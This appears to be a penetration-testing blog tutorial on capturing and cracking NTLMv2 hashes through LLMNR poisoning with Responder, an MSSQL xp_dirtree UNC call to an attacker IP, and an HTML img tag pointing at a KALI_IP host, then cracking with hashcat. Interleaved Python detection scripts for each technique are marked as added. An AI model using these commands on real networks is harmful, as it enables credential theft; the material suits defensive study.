What is NTLM and NTLMv2?
NTLM (NT LAN Manager) is an authentication protocol used in Windows networks. When a user logs in to a Windows machine, their password is hashed (the NT hash) and stored in the machine’s local security authority (LSA) database. When the user accesses a network resource, that NTLM hash is what authenticates them: the client uses it to answer a challenge from the resource, so the hash rather than the password is the secret that matters.
NTLMv2 is a newer and more secure version of NTLM. Although it is more secure, it is still susceptible to several types of attacks. NTLMv2 hashes cannot be used for pass-the-hash attacks, but they can be cracked offline if the underlying password is weak.
What you’ll learn
- LLMNR poisoning to get an NTLM hash
- XSS to get an NTLM hash
- Getting an NTLM hash from MSSQL access
Exploit 1 (LLMNR Poisoning)
What is LLMNR Poisoning?
LLMNR (Link-Local Multicast Name Resolution) is a protocol Windows computers use to find the IP address of other devices on the same network when a DNS server is not available. The computer multicasts a query to every device on the local network asking whether it knows the IP address for a specific hostname. If a device knows the answer, it sends back a response with the IP address, and the computer uses that address to talk to the device.
During an LLMNR/NBT-NS poisoning attack, an attacker on the same network answers a legitimate LLMNR query with a malicious response claiming that the requested name belongs to their own machine. The victim then connects to the attacker and tries to authenticate, and the attacker extracts the NTLMv2 credentials from the intercepted packets. The credentials are hashed but can be cracked if the password is weak.
Demo of LLMNR Poisoning
Note: This Demo will show the perspectives of both the attacker and victim.
To intercept the traffic and steal credentials, we’re going to use the tool “Responder” on Kali.
First, let’s set up a listener with Responder. Make sure to change “eth1” to your own interface.
sudo responder -I eth1 -v
Back on the Windows machine, the user misspells a share name in File Explorer.
To the user, it just looks like this:
But on Kali, we get their hash:
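The detection counterpart to the demo above, as an added example that is not part of the original post: LLMNR reuses the DNS wire format, so a defender can multicast a query for a canary hostname that exists nowhere on the network and treat any answer as evidence of a poisoner. The canary name, transaction IDs and IP addresses below are constructed; the parser, query/response builders and the `probe()` function are my own code, not Responder's or Windows'.

```python
import socket
import struct

# LLMNR reuses the DNS wire format, carried over UDP/5355 to the 224.0.0.252 multicast group.
LLMNR_GROUP = "224.0.0.252"
LLMNR_PORT = 5355
TYPE_A = 1

# Constructed canary: a hostname that exists nowhere on the network. No honest host will
# ever answer a query for it, so any answer comes from something spoofing name resolution.
CANARY_NAMES = {"fileshare-canary-7f3a"}


def encode_name(name: str) -> bytes:
    """Encode a hostname as length-prefixed DNS labels."""
    labels = b"".join(struct.pack("B", len(part)) + part.encode() for part in name.split("."))
    return labels + b"\x00"


def decode_name(data: bytes, off: int):
    """Decode labels at `off`; follows the 0xC0xx compression pointer answers normally use."""
    labels = []
    while True:
        length = data[off]
        if length & 0xC0 == 0xC0:
            ptr = struct.unpack("!H", data[off:off + 2])[0] & 0x3FFF
            labels.append(decode_name(data, ptr)[0])
            return ".".join(labels), off + 2
        off += 1
        if length == 0:
            return ".".join(labels), off
        labels.append(data[off:off + length].decode())
        off += length


def build_query(txid: int, name: str) -> bytes:
    """Constructed LLMNR A-record query, shaped like the one a Windows resolver sends."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", TYPE_A, 1)


def build_response(txid: int, name: str, ip: str) -> bytes:
    """Constructed LLMNR answer mapping `name` to `ip` (the shape of a poisoned reply)."""
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)  # QR=1, one answer
    question = encode_name(name) + struct.pack("!HH", TYPE_A, 1)
    # answer: pointer to the question name at offset 12, type A, class IN, TTL 30, 4 bytes RDATA
    answer = struct.pack("!HHHIH", 0xC00C, TYPE_A, 1, 30, 4) + socket.inet_aton(ip)
    return header + question + answer


def parse_llmnr(data: bytes) -> dict:
    """Parse the header, questions and any A-record answers out of one LLMNR datagram."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", data[:12])
    off = 12
    questions, answers = [], []
    for _ in range(qdcount):
        name, off = decode_name(data, off)
        qtype, _ = struct.unpack("!HH", data[off:off + 4])
        off += 4
        questions.append((name, qtype))
    for _ in range(ancount):
        name, off = decode_name(data, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        off += 10
        rdata = data[off:off + rdlen]
        off += rdlen
        if rtype == TYPE_A and rdlen == 4:
            answers.append((name, socket.inet_ntoa(rdata)))
    return {"id": txid, "is_response": bool(flags & 0x8000),
            "questions": questions, "answers": answers}


def check_for_poisoner(data: bytes, canaries=CANARY_NAMES):
    """Return the IP a response maps a canary name to, or None if the datagram is benign."""
    pkt = parse_llmnr(data)
    if not pkt["is_response"]:
        return None
    for name, ip in pkt["answers"]:
        if name.lower() in canaries:
            return ip
    return None


def probe(timeout: float = 2.0):
    """Send one canary query to the LLMNR group and collect every host that answers it."""
    name = next(iter(CANARY_NAMES))
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_query(0x4242, name), (LLMNR_GROUP, LLMNR_PORT))
    hits = []
    try:
        while True:
            data, (src, _) = sock.recvfrom(2048)
            ip = check_for_poisoner(data)
            if ip:
                hits.append((src, ip))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return hits


if __name__ == "__main__":
    print(probe() or "no LLMNR answer for the canary name")
```

Run `probe()` from a host on the segment you want to watch; a tuple of (source address, advertised address) means something answered for a name that does not exist. The canary should be rotated occasionally so it stays meaningless to everyone but the monitor.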
Exploit 2 (MSSQL access to NTLM Hash)
How does the exploit work?
I recently found out about this method, but it’s super interesting to me just because of how easy it is.
To summarize: when the xp_dirtree stored procedure is executed with a UNC path (//192.168.5.6/file), it sends a network request to the specified remote server to list that file system. To send that request, the SQL Server service tries to authenticate to the remote server with its own Windows credentials, i.e. the account the service runs as. The attacker can pretend to be the remote server and use that authentication attempt to capture the NTLMv2 hash of that account.
Demo of MSSQL Exploit
Scenario: we are able to log in to an MSSQL server as the user “J.Williams” with his password. We log in with mssqlclient.py (from Impacket).
Just like last time, start Responder on Kali.
After that, log in with mssqlclient.py and run the xp_dirtree call from its SQL prompt:
mssqlclient.py -p 1433 WANDA/J.Williams:Password1@192.168.5.6
EXEC master..xp_dirtree '\\192.168.5.7\test';
Back in Responder, we get the NTLMv2 hash of the ms-sql user.
Note: we got a hash for the ms-sql user because that’s the account the MS-SQL service runs as. If it ran as “user1”, we would have gotten the hash for user1.
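A detection for this exploit, as an added example that is not part of the original post: because xp_dirtree makes the SQL Server service account authenticate to whatever host the UNC path names, an audit of executed statements can flag file-system procedures whose UNC target is a raw IP or a host outside an allowlist. The log format, the allowlist and the four sample records below are constructed (the `WANDA\J.Williams` login and `192.168.5.7` mirror the demo); `xp_fileexist` and `xp_subdirs` are included in the watch list because they accept UNC paths in the same way.

```python
import ipaddress
import re

# Extended stored procedures that touch the file system and accept a UNC path; when the
# path points at another host, SQL Server authenticates to it as its service account.
WATCHED_PROCS = r"xp_dirtree|xp_fileexist|xp_subdirs"

# Constructed allowlist: hosts the SQL Server service is expected to reach over SMB.
APPROVED_UNC_HOSTS = {"fileserver01", "backup01.wanda.local"}

# Constructed sample audit records (one statement per line) in a simple key=value layout.
LOG_LINES = [
    "2024-01-09T10:01:12Z login=WANDA\\J.Williams stmt=SELECT name FROM sys.databases",
    "2024-01-09T10:02:45Z login=WANDA\\J.Williams stmt=EXEC master..xp_dirtree '\\\\192.168.5.7\\test';",
    "2024-01-09T10:03:01Z login=WANDA\\svc_backup stmt=EXEC xp_fileexist '\\\\fileserver01\\backups\\db.bak'",
    "2024-01-09T10:04:30Z login=WANDA\\J.Williams stmt=EXEC master..xp_subdirs '\\\\10.0.0.9\\share'",
]

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+login=(?P<login>\S+)\s+stmt=(?P<stmt>.*)$")
PROC_RE = re.compile(r"\b(" + WATCHED_PROCS + r")\b", re.IGNORECASE)
UNC_RE = re.compile(r"\\\\([^\\\s'\";]+)")   # host part of \\host\share


def unc_hosts(stmt: str) -> list:
    """Return every host named by a UNC path in the statement."""
    return UNC_RE.findall(stmt)


def classify_target(host: str):
    """Reason to alert on this UNC host, or None when it is an approved name."""
    try:
        ipaddress.ip_address(host)
        return "UNC target is a raw IP address"     # approved shares are reached by name
    except ValueError:
        pass
    if host.lower() not in APPROVED_UNC_HOSTS:
        return "UNC target not in allowlist"
    return None


def scan(lines) -> list:
    """Flag watched procedures that would make SQL Server authenticate to an unexpected host."""
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        proc = PROC_RE.search(m["stmt"])
        if not proc:
            continue
        for host in unc_hosts(m["stmt"]):
            reason = classify_target(host)
            if reason:
                alerts.append({"ts": m["ts"], "login": m["login"],
                               "proc": proc.group(1).lower(), "target": host, "reason": reason})
    return alerts


if __name__ == "__main__":
    for a in scan(LOG_LINES):
        print(f'{a["ts"]} {a["login"]} {a["proc"]} -> \\\\{a["target"]}: {a["reason"]}')
```

The rule keys on the UNC host rather than on the procedure alone because legitimate backup jobs call these procedures too; what matters is where the service account is being made to authenticate. Running the service as a dedicated low-privilege account, as the note above implies, also limits what a captured response is worth.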
Exploit 3 (XSS to NTLM Hash)
How does it work
This attack involves an attacker hosting a web page that makes the victim’s browser show a Windows Security prompt asking for credentials. The page contains an HTML tag that references the Responder server, which captures the NTLMv2 hash when the victim answers the prompt.
Demo
First, let’s set up a web page using Python’s http.server module. The index.html file should contain this:
<html><img src="http://KALI_IP/"></html>
Now start responder the same way we did previously.
The next step is to get the victim to connect to this webpage. Once the victim goes to the site, Windows Security will prompt them to sign in.
If the user enters their credentials, we get their hash back in Responder.
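A way to spot this from the defender's side, as an added example that is not part of the original post: the image tag above only works because the Responder server answers with an HTTP 401 carrying an NTLM challenge and the browser then sends an NTLM AUTHENTICATE message. A proxy or web gateway that logs those headers can flag NTLM exchanges with hosts that are not expected to do Windows-integrated authentication. The log layout, the trusted-host list, the token builder and the sample lines below are all constructed; the detector reads only the `NTLMSSP` signature, the message type at offset 8 and, for a CHALLENGE, the 8-byte server challenge at offset 24.

```python
import base64
import ipaddress
import re
import struct

NTLMSSP_SIG = b"NTLMSSP\x00"
MSG_NAMES = {1: "NEGOTIATE", 2: "CHALLENGE", 3: "AUTHENTICATE"}

# Constructed allowlist of servers the proxy is expected to see Windows-integrated auth for.
TRUSTED_NTLM_HOSTS = {"192.168.5.10", "intranet.wanda.local"}


def make_token(msg_type: int, server_challenge: bytes = b"\x00" * 8) -> str:
    """Constructed minimal NTLM token: signature, message type and, for a CHALLENGE, the
    8-byte ServerChallenge at offset 24. Only the fields the detector reads are populated."""
    raw = NTLMSSP_SIG + struct.pack("<I", msg_type) + b"\x00" * 12
    raw += server_challenge + b"\x00" * 8
    return base64.b64encode(raw).decode()


def parse_token(token_b64: str):
    """Return (message type, server challenge hex or None) for a base64 NTLM token."""
    try:
        raw = base64.b64decode(token_b64, validate=True)
    except ValueError:
        return None
    if len(raw) < 12 or not raw.startswith(NTLMSSP_SIG):
        return None
    msg_type = struct.unpack("<I", raw[8:12])[0]
    challenge = raw[24:32].hex() if msg_type == 2 and len(raw) >= 32 else None
    return msg_type, challenge


LINE_RE = re.compile(
    r"^(?P<ts>\S+) client=(?P<client>\S+) dst=(?P<dst>\S+) status=(?P<status>\d+) "
    r"(?P<hdr>WWW-Authenticate|Authorization): NTLM(?: (?P<tok>\S+))?$")


def is_trusted(dst: str) -> bool:
    return dst.lower() in TRUSTED_NTLM_HOSTS


def scan_proxy_log(lines) -> list:
    """Flag NTLM challenges and, above all, NTLM AUTHENTICATE messages exchanged with hosts
    that are not expected to perform Windows-integrated authentication."""
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or is_trusted(m["dst"]):
            continue
        parsed = parse_token(m["tok"]) if m["tok"] else None
        if m["hdr"] == "WWW-Authenticate":
            stage, challenge = "CHALLENGE", parsed[1] if parsed else None
        elif parsed and parsed[0] == 3:
            stage, challenge = "AUTHENTICATE", None   # credentials material actually left the client
        else:
            continue
        try:
            scope = "internal" if ipaddress.ip_address(m["dst"]).is_private else "external"
        except ValueError:
            scope = "named host"
        alerts.append({"ts": m["ts"], "client": m["client"], "dst": m["dst"],
                       "scope": scope, "stage": stage, "server_challenge": challenge})
    return alerts


# Constructed proxy log: one legitimate exchange with a trusted intranet server, then a client
# that hits an untrusted host which answers 401 + NTLM and finally receives the AUTHENTICATE.
SAMPLE_LOG = [
    "2024-01-09T11:00:01Z client=192.168.5.23 dst=192.168.5.10 status=401 WWW-Authenticate: NTLM",
    "2024-01-09T11:00:01Z client=192.168.5.23 dst=192.168.5.10 status=200 Authorization: NTLM " + make_token(3),
    "2024-01-09T11:02:01Z client=192.168.5.23 dst=192.168.5.6 status=401 WWW-Authenticate: NTLM",
    "2024-01-09T11:02:01Z client=192.168.5.23 dst=192.168.5.6 status=401 Authorization: NTLM " + make_token(1),
    "2024-01-09T11:02:01Z client=192.168.5.23 dst=192.168.5.6 status=401 WWW-Authenticate: NTLM "
    + make_token(2, bytes.fromhex("1122334455667788")),
    "2024-01-09T11:02:02Z client=192.168.5.23 dst=192.168.5.6 status=401 Authorization: NTLM " + make_token(3),
]

if __name__ == "__main__":
    for a in scan_proxy_log(SAMPLE_LOG):
        print(a)
```

The AUTHENTICATE stage is the one worth paging on: it means the NTLMv2 response for that user has already been handed to an unexpected server. The server challenge pulled from the CHALLENGE message is the same value that appears as the third field of the captured hash line, which makes it easy to tie a proxy alert to a later cracking attempt.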
Cracking the Hash
Let’s try cracking the hash we got from Exploit 2 (the MSSQL demo). Set the hash mode (-m) to 5600, which is hashcat’s NetNTLMv2 mode.
hashcat -m 5600 hash.txt /home/activepwn/Documents/rockyou.txt
Thanks for reading! If you enjoyed reading or found the post useful, please consider sharing it.